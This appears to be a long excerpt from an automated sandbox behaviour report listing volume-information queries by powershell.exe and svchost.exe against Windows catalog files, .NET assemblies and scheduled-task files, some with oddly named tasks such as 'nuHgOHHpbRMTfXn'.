Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\explorere VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\explorere VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\explorer VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\explorer VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\explorere VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\explorere VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\launcherl VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\launcherl VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\launcher VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\launcher VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\launcherl VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\launcherl VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfX VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfX VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfX VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfX VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ApplicationFrameHostA VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ApplicationFrameHostA VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ApplicationFrameHost VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ApplicationFrameHostA VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ApplicationFrameHostA VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ComComponentDriverIntoC VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ComComponentDriverIntoC VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ComComponentDriverInto VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ComComponentDriverInto VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ComComponentDriverIntoC VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\ComComponentDriverIntoC VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
